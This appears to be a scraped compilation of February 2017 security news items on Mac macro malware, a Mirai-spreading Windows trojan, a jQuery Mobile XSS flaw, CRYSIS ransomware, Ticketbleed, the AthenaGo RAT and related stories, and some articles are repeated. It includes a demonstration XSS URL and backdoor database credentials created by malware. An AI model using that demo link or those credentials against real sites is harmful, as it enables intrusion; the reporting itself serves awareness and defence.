However, security researchers have now detected the first in-the-wild instance of hackers are making use of malicious macros in Word documents to install malware on Mac computers and steal your data – an old Windows technique.
The hack tricks victims into opening infected Word documents that subsequently run malicious macros. One such malicious Word file discovered by the researcher was titled "U.S. Allies and Rivals Digest Trump's Victory – Carnegie Endowment for International Peace.docm."
However, after clicking on the malicious Word document and before running it on your system, Mac users are always prompted to enable macros.
Denying permission can save you, but if enabled ignoring warnings, the embedded macro executes a function, coded in Python, that downloads the malware payload to infect the Mac PCs, allowing hackers to monitor webcams, access browser history logs, and steal password and encryption keys.
According to a blog post published this week by Patrick Wardle, director of research at security firm Synack, the Python function is virtually identical to EmPyre – an open source Mac and Linux post-exploitation agent.
"It’s kind of a low-tech solution, but on one hand it’s abusing legitimate functionality so it’s not going to crash like a memory corruption or overflow might, and it’s not going to be patched out," said Wardle.
Wardle tracked the IP address from which the malicious Word documents were spread to Russia and that IP has previously been associated with malicious activities like phishing attacks.
adobe flash malware
Another malicious attack discovered by researchers this week also relied on standard Windows techniques by prompting users to download and install a fake software update, but actually harvest the user Keychain, phish usernames and passwords, and other sensitive data.
The MacDownloader nasty virus presented itself as both an update for Adobe Flash and the Bitdefender Adware Removal Tool, which are always annoying and dismissed by most users.
This is what all attackers want. Once the user clicks on either reject the updates or just press yes to dismiss it once and for all, the malware gets the green signal to harvest user keychain, phish usernames and passwords, collect private and sensitive data, and then send them back to attackers.
Researchers have spotted macOS malware targeting mostly the defense industry and reported to have been used against a human rights advocate.
The best way to avoid these kinds of attacks is to just deny permission to enable macros from running when opening a suspicious Word document and avoid downloading software from third-party App Store or untrusted websites.
New Windows Trojan Spreads MIRAI Malware To Hack More IoT Devices
10.2.2017 thehackernews Virus
MIRAI – possibly the biggest IoT-based malware threat that emerged last year, which caused vast internet outage in October last year by launching massive distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.
Now, the infamous malware has updated itself to boost its distribution efforts.
Researchers from Russian cyber-security firm Dr.Web have now uncovered a Windows Trojan designed to built with the sole purpose of helping hackers spread Mirai to even more devices.
Mirai is a malicious software program for Linux-based internet-of-things (IoT) devices which scan for insecure IoT devices, enslaves them into a botnet network, and then used them to launch DDoS attacks, and spreads over Telnet by using factory device credentials.
It all started early October last year when a hacker publicly released the source code of Mirai.
Dubbed Trojan.Mirai.1, the new Trojan targets Windows computers and scans the user's network for compromisable Linux-based connected devices.
Once installed on a Windows computer, the Trojan connects to a command-and-control (C&C) server from which it downloads a configuration file containing a range of IP addresses to attempt authentication over several ports such as 22 (SSH) and 23 (Telnet), 135, 445, 1433, 3306 and 3389.
Successful authentication lets malware runs certain commands specified in the configuration file, depending on the type of compromised system.
In the case of Linux systems accessed via Telnet protocol, the Trojan downloads a binary file on the compromised device, which subsequently downloads and launches Linux.Mirai.
"Trojan.Mirai.1's Scanner can check several TCP ports simultaneously. If the Trojan successfully connects to the attacked node via any of the available protocols, it executes the indicated sequence of commands," claimed the company in an advisory published this week.
Once compromised, the Trojan can spread itself to other Windows devices, helping hackers hijack even more devices.
Besides this, researchers noted that the malware could also identify and compromise database services running on various ports, including MySQL and Microsoft SQL to create a new admin “phpminds” with the password a “phpgodwith,” allowing attackers to steal the database.
At this time it’s not known who created this, but the attack design demonstrates that your IoT devices that are not directly accessible from the internet can also get hacked to join the Mirai botnet army.
Every website that uses jQuery Mobile, and has any open redirect is vulnerable to XSS
10.2.2017 seccuritaffairs Mobil
Every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to cross-site scripting (XSS) attacks.
The jQuery Foundation’s jQuery Mobile project is an HTML5-based framework that allows users to design a single responsive web site or application that will work on all popular mobile devices and desktop systems.
According to the foundation, the jQuery Mobile is currently used on more than 150,000 active websites. The Google security engineer Eduardo Vela has discovered that the jQuery Mobile framework can expose websites to cross-site scripting (XSS) attacks in case they are affected also by an open redirect vulnerability.
A few months ago, Vela was searching for CSP bypasses and noticed an interesting behavior of the jQuery Mobile. The jQuery Mobile would fetch any URL in the location.hash and put it in innerHTML, this behavior would be exploited by an attacker under specific conditions. I thought that was pretty weird, so decided to see if it was vulnerable to XSS.
Vela started searching for XSS vulnerability and devised the following attack:
jQuery Mobile checks if you have anything in location.hash.
If your location.hash looks like a URL, it will try to set history.pushState on it, then it will do an XMLHttpRequest to it.
Then it will just innerHTML the response.
The expert explained that despite the history.pushState should prevent XSS attacks, it is still possible to exploit such kind of flaws if the website is affected by an open redirect vulnerability.
Below the demo provided by Vela:
http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html
According to the expert, there are many websites vulnerable to such attacks because many organizations don’t consider open redirects as security vulnerabilities, such kind of issues are present in major websites such as Google, YouTube, Facebook, Baidu, and Yahoo.
Now the bad news!
Vela reported the flaw to jQuery Mobile development team, but likely it will not be fixed due to the potential impact of a fix on the existing applications. The development team confirmed the risks to their users.
“The jQuery Mobile team explained that they consider the Open Redirect to be the vulnerability, and not their behavior of fetching and inlining, and that they wouldn’t want to make a change because that might break existing applications. This means that there won’t be a patch as far as I have been informed. The jQuery mobile team suggests to 403 all requests made from XHR that might result in a redirect.” wrote Vela.
“This means that every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to XSS.“
Vela is inviting experts to try to exploit the same XSS in the absence of the open redirect vulnerability, he already tested it but without success.
“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn’t work out,” added Vela.
“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs”
CRYSIS Ransomware is back and crooks are using RDP attacks once again
10.2.2017 seccuritaffairs Virus
CRYSIS Ransomware attacks leveraging brute force via Remote Desktop Protocol (RDP) are still ongoing, mostly targeting US firms in the healthcare.
Do you remember the CRYSIS ransomware? It is a ransomware that appeared in the threat landscape last year, now researchers at Trend Micro discovered the CRYSIS ransomware is being distributed via Remote Desktop Protocol (RDP) brute force attacks.
The malware was spread with the same technique in September 2016, when crooks targeted businesses in Australia and New Zealand. Now cyber criminals are targeting organizations across the world.
The researchers at Trend Micro observed a significant increase in the number of CRYSIS ransomware infections in January 2017 compared to the previous months. The last wave of attacks mostly targeted US organizations in the healthcare industry.
“In fact, the volume of these attacks doubled in January 2017 from a comparable period in late 2016. While a wide variety of sectors have been affected, the most consistent target has been the healthcare sector in the United States.” states the blog post published by Trend Micro.
The researchers believe that behind the two campaigns there are the same threat actors.
“We believe that the same group of attackers is behind the earlier attacks and the current campaign. The file names being used are consistent within each region. Other parts of this attack—such as where the malicious files are dropped onto the compromised machine—are also consistent.” continues the report.
The attackers used a folder shared on the remote PC to transfer malware from their machine, and in some cases, they used the clipboard to transfer files.
Both techniques expose the local resources of the attacker to the remote machine, and vice-versa.
The researchers observed multiple login attempts with commonly-used credentials, then when attackers determined the correct username and password usually come back multiple times within a short period trying to infect the endpoint.
“In one particular case, we saw CRYSIS deployed six times (packed different ways) on an endpoint within a span of 10 minutes. When we went over the files that were copied, they were created at various times during a 30-day period starting from the time of the first compromise attempt. The attackers had multiple files at their disposal, and they were experimenting with various payloads until they found something that worked well.” states the report.
These methods, they reveal, exposed the local resources of the attacker to the remote machine, and vice-versa.
Trend Micro suggests organizations apply proper security settings in Remote Desktop Services, for example disabling access to shared drives and the clipboard, making impossible for the attackers to copy malicious payloads via RDP.
The experts also suggest to carefully monitor logs to identify attackers’ IP addresses.
Ticketbleed flaw in F5 Networks BIG-IP appliances exposed to remote attacks
9.2.2017 securityaffairs Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’ that exposes it to remote attacks
The F5 Networks BIG-IP appliances are affected by a serious flaw, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’, that can be exploited by a remote attacker to extract the content of the memory, including sensitive data (i.e. SSL session IDs).
The list of F5 BIG-IP servers affected by the flaw includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM
The CVE-2016-9244 vulnerability was discovered by the popular security expert Filippo Valsorda and his colleagues at CloudFlare while investigating a bug report from their customer.
“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” said Valsorda.
“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory.”
The group reported the issue to F5 in late October, the security firm confirmed the issue affects the BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled.
“A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.” reads the security advisory published by F5.
Ticketbleed reminds use the dangerous Heartbleed flaw in the OpenSSL library, however, unlike Heartbleed, Ticketbleed exposes only 31 bytes of memory instead of 64 kb.
The Ticketbleed is clearly less efficient of the Heartbleed because it requires more rounds to carry on and it affects only F5 products. An Internet scan demonstrated that that hundreds of hosts had been exposed by the flaw.
The company suggests as a workaround to disable the Session Tickets option on the vulnerable Client SSL profile, this is possible accessing to the menu item “Local Traffic > Profiles > SSL > Client ” of the Configuration utility.
The expert Filippo Valsorda has developed a free online tool that could be used to check if a product is affected by the Ticketbleed issue.
Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.
Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.
ENISA Threat Landscape Report 2016, who is attacking us, and how?
9.2.2017 securityaffairs Attack
ENISA has issued the annual ENISA Threat Landscape Report 2016, a document that synthesizes the emerging trends in cyber security
The European Union Agency for Network and Information Security (ENISA) is an EU Agency composed of security experts that work with these states, public organizations and private groups to develop advice and recommendations on good practice in information security.
I’m very proud to be a member of the group that annually publish an interesting report that summarizes top cyber threats identified during the last 12 months.
The new report, titled ENISA Threat Landscape Report 2016, analyzes the huge number of cyber-incidents that made the headlines in 2016, focusing on threat actors and their TTPs (Tactics, techniques, and procedures).
The document is composed of the following sessions:
“Cyber Threat Intelligence and ETL” provides an overview of recent developments in cyber-threat intelligence positions the ETL and summarizes some cyber-threat intelligence issues that are seen as emerging.
“Top Cyber-Threats,” it provides the results of the yearly threat assessment for the top 15 cyber-threats.
“Threat Agents” is an overview of threat actors.
“Attack Vectors”
“Conclusions” and some policy, business and research recommendations.
“ETL 2016 is streamlined towards the top cyber-threats, providing information on threat agents and attack vectors including all the remarkable developments, trends and issues. Moreover, it reports about threat agents their motivations, and how their practices, tools and techniques have advanced.” read an introduction to the report.
The ENISA Threat Landscape Report 2016 is an impressive source of data and references to the events that characterized the threat landscape in 2016.
The vast majority of the attacks was financially and politically motivated, the year 2016 is thus characterized by “the efficiency of cyber-crime monetization.” Crooks have monetized their effort not only with the illegal activities they conducted but also offering their services through the consolidated model of sale known as “crime-as-a-service.”
Fortunately, we are observing an increasing maturity of defenders when dealing cyber threats and a successful effort of international law enforcement agencies that conducted many operations disrupting criminal organizations.
However, attackers are still one step ahead as explained in the report. The advances of defenders have been the result of the superiority of attackers in:
Abusing unsecured components to mobilize a very large attack potential. This capacity that has been demonstrated by means of DDoS attacks by infected IoT devices.
Successfully launching extortion attacks that have targeted commercial organisations and have achieved very high levels of ransom and high rates of paying victims.
Demonstrating very big impact achieved by multi-layered attacks to affect the outcome of democratic processes at the example of the US elections.
Operating large malicious infrastructures that are managed efficiently and resiliently to withstand takedowns and allow for quick development and multi-tenancy.
Malware remains the principal cyber-threat in 2016, the number of samples reached ca. 600 million per quarter, mobile malware (reaches a growth of ca. 150%) and ransomware have monopolized the threat landscape. Web based attacks and web application attacks follow malware in the Top 15, no change has been observed respecting 2015.
Web based attacks include malicious URLs, compromised domains, browser exploits and drive-by attacks.
“Web based attacks are those that use web components as an attack surface. As web components we understand parts of the web infrastructure, such as web servers, web clients (browsers) content management systems (CMS) and browser extensions” states the report.
The category of web application attacks includes classic techniques like cross-site scripting and SQL-injection (SQLi) that anyway continues to be a privileged attack vector of threat actors. In the fourth place there are the Botnets, these infrastructures are an essential component for a large number of cyber attacks.
The DDoS attacks reached the fourth place, it is the result of extortion activities and the availability in the criminal underground of DDoS-for-hire services that offer to wannabe hackers all the necessary to launch powerful attack.
The report also provides an interesting analysis of top threat actors observed in 2016, Cyber-criminals, insiders, cyber spies, hacktivists, cyber fighters, cyber terrorists and script kiddies operate with different techniques, but in many cases the observed an overlap of their TTPs caused by the evolution of the crime-as-service model.
The ENISA Threat Landscape Report 2016 also associated the various threat to the above threat agents, an interesting exercize that allowed us to better profile the attackers.
Based on the material ENISA’s experts collected, the report provided our conclusions for policy makers, businesses, and research.
“As we speak, the cyber-threat landscape is receiving significant high-level attention: it is on the agenda of politicians in the biggest industrial countries. This is a direct consequence of ‘cyber’ becoming mainstream, in affecting people’s opinions and influencing the political environment of modern societies. Besides this, a lot of developments have taken place regarding the tools and tactics used by adversaries, making 2016 another striking sample of the dynamics of cyber-space. ETL 2016 reflects these developments, while providing strategic information about the cyber-threats and their technical evolution during 2016.” Prof. Udo Helmbrecht, Executive Director of ENISA, commented on the project:
I consider the ENISA Threat Landscape Report 2016 a must reading for the security experts in every industry and executives of any sector, I don’t want tell you more, enjoy it.
The ETL report and related material can be found under the following links:
ETL 2016
Thematic Landscape Hardware
Thematic Landscape Ad-hoc and sensor networking for M2M communications
ENISA Threat Taxonomy
Researchers at Dr Web spotted a Windows version of the Mirai bot
9.2.2017 securityaffairs Virus
Researchers at the antivirus firm Dr.Web discovered a new strain of the Mirai bot, a Windows variant, targeting more ports.
Security experts at the antivirus firm Dr.Web discovered a new strain of the Mirai bot targeting more ports, and it is a Windows version of the popular IoT malware.
The Windows version of the Mirai bot was being used by some criminals to infect IoT devices and carry out DDoS attacks through the spreading of the Mirai Linux malware.
“One of the recent developments on the Mirai malware front was discovered by Russian cyber-security firm Dr.Web, whose experts came across a Windows trojan built with the sole purpose of helping Mirai spread to even more devices” wrote BleepingComputes.com.
The Mirai malware was spotted by the researcher MalwareMustDie in August 2016, it was specifically designed to target IoT devices.
It infected thousands of routers and IoT devices, including DVRs and CCTV system). When the Mirai bot infects a device, it chooses random IPs and attempts to log via the Telnet and SSH port using a list of admin credentials.
Back to the present, the researchers from Dr. Web dubbed the threat Trojan.Mirai.1.
“A Trojan for Microsoft Windows written in C++. Designed to scan TCP ports from the indicated range of IP addresses in order to execute various commands and distribute other malware.” states Dr. Web.
“When launched, the Trojan connects to its command and control server, downloads the configuration file (wpd.dat) and extracts the list of IP addresses. Then the scanner is launched: it refers to the listed addresses and simultaneously checks several ports.”
Unlike the original Mirai Linux malware, Trojan.Mirai.1 scans more ports.
“The Trojan can address the following ports:
* 22
* 23
* 135
* 445
* 1433
* 3306
* 3389
When the Trojan.Mirai.1 succeeds infecting a new device, if the device runs the Linux OS, it executes a series of commands, which end up with the creation of a new DDoS Mirai bot. Instead, if the device that has been infected is is running the Windows OS, it releases a copy of itself.
“It also creates DBMS user with login Mssqla and password Bus3456#qwein, grants him sysadmin privileges. Acting under the name of this user and with the help of SQL server event service, various tasks are executed.” continues the analysis.
“The only exception is a connection via RDP protocol: in this case, none of the instructions are executed. Besides that, while connecting to the Linux device via Telnet protocol, it downloads a binary file on the compromised device, and this file subsequently downloads and launches Linux.Mirai.”
Below some Trojan.Mirai.1’s hash in SHA1:
9575d5edb955e8e57d5886e1cf93f54f52912238
f97e8145e1e818f17779a8b136370c24da67a6a5
42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
938715263e1e24f3e3d82d72b4e1d2b60ab187b8
5 Anti-Surveillance tools that can help you enhance online security and privacy
9.2.2017 securityaffairs Safety
The current digital era is filled with all sorts of cyber dangers. The following tools will help you remain safe by enhancing your online security and privacy.
There are many software tools that can help you preserve and protect your privacy online. For your benefit, I’ve compiled a list of the top 5 software tools that can help you protect your online privacy and security.
DuckDuckGo: Privacy Search Engine
DuckDuckgo was launched in 2008 as an alternative search engine that respects user privacy and claims to have a “superior search experience with smarter answers.” It is one of the most popular search engines that provide real privacy and smarter search without tracking user activity.
This search engine doesn’t log or share any personally identifiable information. DuckDuckGo doesn’t use any cookie and it immediately discards IP addresses of users, nor does it keep any record of searches performed.
PureVPN: VPN Software
PureVPN is a highly regarded Hong Kong-based VPN service offering an unusually wide range of software clients for different platforms, which include Windows, Mac, Ubuntu Linux, and mobile apps for Android, iOS and manual configuration for Windows Phone.
PureVPN operates a self-managed VPN network that currently stands at 750+ Servers in 141 countries, which include seldom-covered areas such as Oceania, Africa, and Central America. It provides an extra layer of privacy. It doesn’t collect or log your online activities and doesn’t monitor what you do online. It promises the best online privacy.
PureVPN has a wide variety of security protocols like OpenVPN, IPSec/L2TP, PPTP, SSTP, and IKEv2. It encrypts your entire internet with 256-bit encryption to protect data and online activities.
ProtonMail: Email Encryption Software
ProtonMail is a free and encrypted email client which provides and enhances your email security to keep your data safe. It’s also available on smartphone devices with special apps for Android & iOS. It provides complete email security with end-to-end encryption. Your emails as well as your contacts always stay private.
Cryptocat: Secure Chat software
Cryptocat is one of the most secure chat software for your computer which allows you to chat with your friends in complete privacy. Every message you send via this app is secured with end-to-end encryption, which ensures all of your communications with other Cryptocat users remains protected.
This open source desktop application is available for Windows, OS X and Linux. With this software, you can also share encrypted files, pictures and videos to your buddies safely and easily. Cryptocat users can also receive messages even when they’re offline.
HTTPS Everywhere: Privacy Browser Extension
HTTPS Everywhere is a free extension which is available on Chrome, Firefox and Opera. This extension is developed primarily by the Tor project and Electronic Frontier Foundation (EFF). This extension encrypts your communications with many websites and makes websites use the more secure HTTPS connection instead of HTTP, if they support it.
We hope that the above extensions will help you out in increasing your online privacy and security. If you have any suggestions that you think are worth adding to this list, feel free to let us know.
About Author (Anas Baig):
Anas Baig is a Digital Marketer & Security Enthusiast. He loves to read & write about Digital Security. If you are interested to get tweets about Marketing & Security !
jQuery Mobile Can Expose Websites to XSS Attacks
9.2.2017 securityweek Attack
A Google security engineer discovered that jQuery Mobile can expose websites to cross-site scripting (XSS) attacks if an open redirect vulnerability is also present.
The jQuery Foundation’s jQuery Mobile project is an HTML5-based user interface system designed for developing responsive websites and web applications that can be accessed from any type of device. According to BuiltWith, jQuery Mobile is currently used on more than 150,000 active websites.
Google’s Eduardo Vela discovered a few months ago that jQuery Mobile checks the location.hash, which returns the anchor part of a URL. If there is a URL in the location.hash, it uses the history.pushState method on it and adds it to an XMLHttpRequest object. The response to this request is used with innerHTML.
The use of history.pushState should prevent XSS attacks, but exploitation is still possible if the website is affected by an open redirect vulnerability. An example provided by Vela looks like this:
http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html
There may be many websites vulnerable to such attacks considering that some organizations, including Google, don’t treat open redirects as vulnerabilities. Open redirects can be found on major websites such as Google, YouTube, Facebook, Baidu and Yahoo.
The expert reported his findings to jQuery Mobile developers, but the problem will not be addressed any time soon due to concerns that changing the current behavior could break existing applications. The jQuery team has admitted that developers should be warned about the risks.
“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn't work out,” Vela wrote in a post on his personal blog.
“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs,” the researcher said.
"Ticketbleed" Flaw Exposes F5 Appliances to Remote Attacks
9.2.2017 securityweek Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability that can be exploited by a remote attacker to extract memory. An Internet scan showed that hundreds of hosts had been exposed by the flaw.
The vulnerability, dubbed “Ticketbleed” and tracked as CVE-2016-9244, was discovered by Filippo Valsorda, cryptography engineer at CloudFlare, and other employees of the content delivery network (CDN). The expert identified the weakness while investigating a bug report from a CloudFlare customer, and notified F5 in late October.
According to F5, the vulnerability affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled. The leaked memory can contain SSL session IDs and other potentially sensitive data.Ticketbleed vulnerability
As its name suggests, Ticketbleed is somewhat similar to the notorious OpenSSL vulnerability known as Heartbleed. However, unlike Heartbleed, Ticketbleed exposes 31 bytes of memory at a time instead of 64 kilobyte chunks – which means an attack requires more rounds – and it’s specific to F5 products.
The list of affected F5 BIG-IP products includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM. Updates that address the flaw have been released for most of these products. As a workaround, users can disable the Session Tickets option on the affected Client SSL profile from the Configuration utility's Local Traffic > Profiles > SSL > Client menu.
“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” Valsorda explained.
“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory,” the expert added.
Valsorda has made available a simple online tool that allows users to determine if their server is vulnerable to Ticketbleed attacks. Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.
Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.
Government Contractor Indicted Over Theft of Secret Documents
9.2.2017 securityweek BigBrothers
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.
Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.
According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.
The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.
Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).
“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.
Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.
While the suspect’s attorneys have not made any comments recently, The Washington Post reported that they had previously claimed Martin was taking documents home in an effort to become better in his job and he did not intend to provide any information to foreign governments.
At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.
AthenaGo RAT Uses Tor2Web for C&C Communication
9.2.2017 securityweek Virus
A newly observed Remote Access Trojan (RAT) targeting Windows systems is using Tor2Web proxies for communication with the command and control (C&C) server, Cisco Talos security researchers warn.
The RAT was written in Go, which is rather unusual for Windows malware, and its author refers to it as Athena, which determined the security researchers to call it AthenaGo. The Trojan, Cisco Talos threat researcher Edmund Brumaghin explains, can download and run additional binaries on the infected system, besides relying on Tor2Web proxies for communication purposes.
The malware is distributed via macro-enabled Word documents, an incresingly popular delivery method that was recently used to drop macOS malware as well. The malicious documents distributing AthenaGo appear to be targeting Portuguese speaking users, as the message that instructs potential victims to enable macros was written in Portuguese.
AthenaGo, one of the few Windows malware families to have been written in Go, comes with two hardcoded domains that it connects to post-infection. Both utilize Tor2Web, a project that allows access to resources on the Tor (The Onion Router) network even if the requesting client system isn’t part of the network.
“Tor2Web servers act as proxies and allow clients to access servers hosting content on Tor without requiring the installation of a local Tor client application. This approach has shown to be increasingly attractive to cybercriminals. The use of Tor2Web and Tor in general allows them to stay anonymous. It also makes it much more difficult to remove malicious content being hosted on servers within Tor, as it is difficult to identify where a Tor server is hosted physically,” the security researcher explains.
During the initial infection process, AthenaGo generates public and private RSA keys that are used to communicate with the C&C server, after which it makes two HTTP HEAD requests to the two hardcoded servers.
The malware includes support for various commands that it executes when receiving instructions from the C&C server: ListDir (for a list of directories on the infected system), ListProcesses (generates a list of processes), KillProcess (to execute the taskkill command against a target process), DownloadFile (to download and save a file), DLRUN (to download a file, save it to %TEMP% and execute it), and RunCMD (to execute system commands on the infected system using Go's os/exec package)
“Malware authors will continue to evolve their attacks as they identify ways to effectively reduce their risk of being caught. This includes relying on C&C infrastructure hosted on Tor, making use of varying levels of encryption to protect the nature and content of network communications with their malware, and limiting their attacks to targeted attacks against specific targets or demographics. AthenaGo is an example of changes in the way malware is being written in an attempt to evade network defenses and successfully compromise target environments,” Cisco Talos’ researcher concludes.
Firms Increasingly Interested in Cyber Insurance: Study
9.2.2017 securityweek Cyber
Companies in the United States, the United Kingdom and Germany are increasingly interested in taking out cyber insurance, according to a new study commissioned by insurance provider Hiscox.
The cyber security readiness study, which involved 3,000 businesses from the three countries, shows that 30% of companies in Germany, 36% in the U.K. and 55% in the U.S. already have cyber insurance. Roughly 30% of the firms that don’t have insurance plan on getting insured in the next 12 months.
The top reasons for taking out cyber insurance are related to the cost of a potential breach and the need for peace of mind, data security concerns, the possibility of customer action, and new data regulations. In roughly one-quarter of cases, cyber insurance is a legal requirement.
More than half of the respondents reported being hit by at least one cyberattack in the last 12 months and the cost of dealing with an incident has been significant. On average, companies in the United States with over 1,000 employees said the largest cyber incident had cost them more than $100,000.
In the case of small U.S. firms, with less than 100 employees, the average cost was roughly $35,000. In the U.K. and Germany, organizations reported spending between approximately $32,000 and $67,000, respectively between $24,000 and $48,000, depending on their size.
The study shows that larger organizations are more likely to be interested in cyber insurance, and financial services is the most insurance-aware sector, with more than half of respondents already having cyber insurance.
Experts pointed out that Germany has been increasingly interested in cyber insurance since the attack on its parliament in 2015. Organizations in Europe are also looking for cyber insurance as a result of the EU’s new data protection regulations, which will take effect in 2018.
Of the companies that do not intend to get cyber insurance, many said the insurance policies are too complicated, they are not exactly sure what cyber insurance is, or they don’t trust the insurer to pay out in the event of an incident.
According to a report published by Allied Market Research (AMR) in December, the global cyber insurance market is expected to generate $14 billion by 2022, which represents a 28 percent increase from 2016.
In the meantime, some security companies have started providing alternatives to the traditional insurance services. San Francisco-based security consulting firm AsTech announced this week that it will be offering a $1 million warranty against breach-related costs if a customer is hacked as a result of a vulnerability that AsTech fails to discover. Endpoint security firm SentinelOne offered similar guarantees last year.
U.S. Queries PayPal in Money Laundering Probe
9.2.2017 securityweek IT
San Francisco - US authorities have demanded information from online payment service PayPal as part of a money laundering investigation, according to a regulatory filing available on Wednesday.
"We have received subpoenas from the US Department of Justice seeking the production of certain information related to our historical anti-money laundering program," Silicon Valley-based PayPal said in an annual report to the US Securities and Exchange Commission.
PayPal noted that it was cooperating with authorities and did not speculate on the outcome of the investigation. No further details were provided.
The news appeared to weigh slightly on PayPal shares, which were down more than 1.5 percent to $40.24 in after-market trades on the Nasdaq.
"Ticketbleed" Flaw Exposes F5 Appliances to Remote Attacks
9.2.2017 securityweek Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability that can be exploited by a remote attacker to extract memory. An Internet scan showed that hundreds of hosts had been exposed by the flaw.
The vulnerability, dubbed “Ticketbleed” and tracked as CVE-2016-9244, was discovered by Filippo Valsorda, cryptography engineer at CloudFlare, and other employees of the content delivery network (CDN). The expert identified the weakness while investigating a bug report from a CloudFlare customer, and notified F5 in late October.
According to F5, the vulnerability affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled. The leaked memory can contain SSL session IDs and other potentially sensitive data.Ticketbleed vulnerability
As its name suggests, Ticketbleed is somewhat similar to the notorious OpenSSL vulnerability known as Heartbleed. However, unlike Heartbleed, Ticketbleed exposes 31 bytes of memory at a time instead of 64 kilobyte chunks – which means an attack requires more rounds – and it’s specific to F5 products.
The list of affected F5 BIG-IP products includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM. Updates that address the flaw have been released for most of these products. As a workaround, users can disable the Session Tickets option on the affected Client SSL profile from the Configuration utility's Local Traffic > Profiles > SSL > Client menu.
“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” Valsorda explained.
“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory,” the expert added.
Valsorda has made available a simple online tool that allows users to determine if their server is vulnerable to Ticketbleed attacks. Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.
Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.
Government Contractor Indicted Over Theft of Secret Documents
9.2.2017 securityweek Incindent
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.
Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.
According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.
